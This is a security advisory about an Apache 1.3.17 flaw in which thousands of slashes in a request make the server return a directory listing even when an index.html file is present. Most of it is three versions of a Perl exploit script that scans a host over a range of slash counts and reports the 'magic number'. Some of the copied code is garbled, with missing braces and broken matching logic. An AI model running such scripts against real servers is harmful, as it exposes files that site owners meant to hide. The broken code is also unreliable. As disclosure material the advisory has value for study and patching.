

    Apache 1.3.17 and below


    Matt Watchinski found following.  This exploit tricks apache  into
    returning a Index  of the a  directory even if  an index.html file
    is present.  May not work on some OS's

    http_request.c  has  a  subroutine  called  ap_sub_req_lookup_file
    that in very specific cases would feed stat() a filename that  was
    longer than stat() could handle.  This would result in a condition
    where  stat()  would  return  0  and  a  directory  index would be
    returned instead of the default index.html.

    Code Fragment: /src/main/http_request.c

        if (strchr(new_file, '/') == NULL) {
            char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);

            rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
            rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
            ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */
            if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
                rnew->finfo.st_mode = 0;

    Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled.  The
    directory must also have  the following Options enabled:   Indexes
    and MultiView.  Some OS's have different conditions on the  number
    of character you have to pass to stat to make this work.  If  stat
    doesn't return  0 for  path names  less than  8192 or  so internal
    apache buffer checks will stop this exploit from working.

    Debian needed around 4060 /'s to make this work.  The exploit:

    # farm9, Inc. (copyright 2001)
    # Name: Apache Artificially Long Slash Path Directory Listing Exploit
    # Author: Matt Watchinski
    # Ref: SecurityFocus BID 2503
    # Affects: Apache 1.3.17 and below
    # Tested on: Apache 1.3.12 running on Debian 2.2
    # Greets: Special thanks to natasha who added a lot of debug to apache for me
    #	  while i was trying to figure out what had to be enabled to make this
    #	  exploit work.  Also thanks to rfp for pointing out that MultiView
    #	  needed to be enabled.
    # More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
    #               Anne for being so sexy <I never though corporate espionage
    #                   would be so fun>
    #               All my homies at farm9
    #               DJ Charles / DJ NoloN for the phat beats
    #               Marty (go go gadget snort)
    #               All my ex-bees
    #               RnVjazpIaXZlcndvcmxk
    # I think that wraps it up.  Have fun.
    # Usage: ./ <host> <port> <HI> <Low>
    # Where: Hi and low are the range for the number of / to try

    use IO::Socket;

    $low  = $ARGV[3]; #Low number of slash characters to try
    $hi   = $ARGV[2]; #High number of slash characters to try
    $port = $ARGV[1]; #Port to try to connect to
    $host = $ARGV[0]; #Host to try to connect to

    # Main loop.  Not much to this exploit once you figure out what needed to
    # be enabled.  Need to do some more testing on sub-dirs to see if it
    # works with them.  It should. Also different OS's might use a differnt number
    # of /.  Send me the numbers if you don't mind

    while($low <= $hi)

    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
    Proto => "TCP") or die "Connect Failed";

      $url = "";
      $buffer = "";
      $end = "";

      $url = "GET ";
      $buffer = "/" x $low . " HTTP/1.0\r\n";
      $end = "\r\n\r\n";

      $url = $url . $buffer . $end;

      print $socket "$url";
        if($_ =~ "Index of")
          print "Found the magic number: $low\n";
          print "Now go do it by hand to to see it all\n";


    In some testings you need to take the Host header into account.

        :   $url = "GET ";
        :   $buffer = "/" x $low . " HTTP/1.0\r\n";
        :   $end = "\r\n\r\n";

    The server tested against uses mod_rewrite to do virtual  hosting,
    and it arrived at a  different magic number with the  host header,
    and against without the header.   In that case make the  following
    change to the above code:

        $buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";

    Should be fairly easy to understand.

    Siberian rewrote a  lot of it's  code.  Now  it will also  work if
    executed from a Windows box.

    # orginal by farm9, Inc. (copyright 2001)
    # new modified code by Siberian (
    # Note: This isn't the orginal exploit! This one was modified and partly rewritten.
    # Changes:
    # - help added (more user firendly :-) )
    # - messages added
    # - exploit is now able to be executed on WinNT or 2k.
    # - uses perl version of BSD sockets (compatible to Windows)
    # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
    # of the code and made it esaier to use and cross platform compatible.
    # The old verion used a esaier but not that compaible way of socket stream communication.
    # Any network code was replaced by cross platform compatible BSD sockets.
    # (much better than any other stream method :-) )
    # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
    use Socket;
    print "Apache Artificially Long Slash Path Directory Listing Exploit\nSecurityFocus BID 2503\n\n";
    print "original exploit code written by Matt Watchinski (\n";
    print "rewritten and fixed by Siberian (\n\n";
    $host = shift || 'localhost'; #Host to try to connect to
    $port = shift || '80'; #Port to try to connect to
    $hi   = shift || '100'; #High number of slash characters to try
    $low  = shift || '0'; #Low number of slash characters to try
    if(($host eq 'localhost') && ($port eq '80') && ($hi eq '100') && ($low eq '0')) {
    print 'Usage: ./ <host> <port> <HI> <Low>';
    print "\nHi and low are the range for the number of \/ to try\n";
    exit 0;
    print "\ntarget: $host";
    print "\nport: $port";
    print "\nhi: $hi";
    print "\nlow: $low\n\nStarting attack...\n\n";
    # Main loop.  Not much to this exploit once you figure out what needed to
    # be enabled.  Need to do some more testing on sub-dirs to see if it
    # works with them.  It should. Also different OS's might use a different number
    # of /.  Send me the numbers if you don't mind
    $url = "";
    $buffer = "";
    $end = "";
    #$port = (getservbyname($port, 'tcp') || die "No port!");
    $iaddr = inet_aton($host);
    $paddr = sockaddr_in($port, $iaddr) or die "Faild ...  SOCKADDR_IN!";
    $proto = getprotobyname('tcp');
    while($low <= $hi) {
    socket(SOCKY, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
    connect(SOCKY, $paddr ) or die "connect: $!";;
    $url = "GET ";
    $buffer = "/" x  $low .  " HTTP/1.0\r\n";
    $end = "\r\n\r\n";
    $url = $url . $buffer . $end;
    print ".";
     send(SOCKY,$url,0) or die "send: $!";;
     while((recv(SOCKY,$out,1,0)) && ($out ne "")) {
        if($out eq "I") {
         if($out eq "n") {
          if($out eq "d") {
           if($out eq "e") {
            if($out eq "x") {
              if($out eq " ") {
               if($out eq "o") {
                 if($out eq "f") {
               print "Found the magic number: $low\n";
               print "Now go do it by hand to to see it all\n";
               exit 0;
    print "\n\nNot vulnerable :-(\nCheck some other numbers.\n";

    'rain  forest  puppy'  added  following.   Attached is,
    which  is  a  recoded  version   of  Siberian's  recode  of   Matt
    Watchinski's exploit.  His  version uses libwhisker, which  allows
    the  exploit   to  have    HTTP/1.1,   proxy,  and   SSL   support
    automatically.  Basic support (not including SSL) should work  for
    any platform  having Perl.   To use  the attached  exploit, you'll
    need a copy of libwhisker.  The latest is pr3, downloadable at:

    You can either  grab the developer  tarball and build/install  it,
    or just grab  the, put  it in the  same directory as
    the,  and  just  run  will  use  the  module  in  the  same  directory.  For SSL support,
    you'll need either  Crypt::SSLeay or Net::SSLeay  installed (which
    may require OpenSSL).   ActiveState ported  Crypt::SSLeay/Net::SSL
    (not Net::SSLeay) over  to Windows, so  Windows users should  have
    SSL support as well.

    # orginal by farm9, Inc. (copyright 2001)
    # then modified by Siberian (
    # with more modifications by rfp (
    use libwhisker;
    use Getopt::Std;
    # this exploit was modified to use the libwhisker library, which gives
    # HTTP/1.1, proxy, and SSL support.  Plus, small other changes.
    my (%hin,%hout,%args);
    print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
    print "SecurityFocus BID 2503\n\n";
    print "Original exploit code written by Matt Watchinski (\n";
    print "Rewritten and fixed by Siberian (\n";
    print "Moved to libwhisker by rfp\n\n";
    if($args{h} eq ''){
     print 'Usage: ./ <options>, where options:',"\n";
     print '-h host  host to scan (must be specified)',"\n";
     print '-p ##	 host port (default: 80)',"\n";
     print '-L ##	 low end/start of range (default: 1)',"\n";
     print '-H ##	 high end/end of range (default: 8192)',"\n";
     print '-P host	 HTTP proxy via host',"\n";
     print '-R ##	 HTTP proxy port (default: 80)',"\n";
     print '-s	 use SSL (can\'t be used with proxy)',"\n";
     exit 0;
    $low =  $args{L} || 1;
    $high = $args{H} || 8192;
    &lw::http_init_request(\%hin);		# setup our request hash
    $hin{'whisker'}->{'host'}= $args{h};
    $hin{'whisker'}->{'port'}= $args{p} || 80;
    if(defined $args{s}){
 	    $hin{'whisker'}->{'ssl'} = 1;
	    if(defined $args{P}){
		    print "SSL not currently compatible with proxy\n";
		    exit 1;
    if(defined $args{'P'}){
	    $hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
	    print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
	    print "port $hin{'whisker'}->{'proxy_port'}\n";
    &lw::http_fixup_request(\%hin);		# fix any HTTP requirements
    for($c=$low; $c<=$high; $c++){
	    $hin{'whisker'}->{'uri'} = '/' x $c;
		    print "Error: $hout{'whisker'}->{'error'}\n";
		    exit 1;
	    } else {
		    if($hout{'whisker'}->{'http_resp'} == 200 &&
			    $hout{'whisker'}->{'data'}=~/index of/i){
			    print "Found result using $c slashes.\n";
			    exit 0;
	    print "."; # for status
    print "\nNot vulnerable (perhaps try a different range).\n";


    1.3.19 has fixed this.  For Trustix Linux:

    For EnGarde Secure Linux: